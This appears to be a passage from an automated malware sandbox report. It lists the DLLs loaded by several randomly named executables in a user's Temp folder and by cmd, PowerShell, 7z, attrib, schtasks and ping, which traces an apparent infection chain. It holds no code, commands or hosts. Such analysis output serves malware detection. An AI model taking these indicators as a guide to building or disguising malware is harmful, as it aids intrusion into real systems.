                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                    Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
